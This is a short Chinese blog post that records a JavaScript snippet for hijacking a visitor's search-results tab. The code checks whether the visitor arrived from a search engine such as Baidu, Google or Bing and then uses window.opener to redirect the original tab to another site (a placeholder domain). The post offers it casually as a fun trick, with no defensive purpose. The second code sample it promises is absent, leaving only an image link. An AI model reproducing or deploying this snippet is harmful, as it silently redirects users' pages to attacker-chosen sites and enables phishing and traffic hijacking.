劫持搜索页面

| No Comments

  偶然看到丸子博客里面一篇关于“劫持用户浏览器”的文章,感觉挺好玩的。顺便又找了一个类似的代码,记录下来:

  第一段代码:

/*window.opener*/
if (window.opener != null) {
var r = document.referrer;
r = r.toLowerCase();
var aSites = new Array('baidu.', 'jike.', 'sogou.', 'google.', 'soso.', 'so.', '360.', 'bing.', 'yahoo.');
var b = false;
for (i in aSites) {
if (r.indexOf(aSites[i]) > 0) {
b = true;
break;
}
}
if (b) {
window.opener.location.href = 'http://www.xxxxx.com'; 
}
}

   第二段代码:

  图片来源:http://i.wanz.im/2013/07/19/hijacking-referrer-page/

 

 

Leave a comment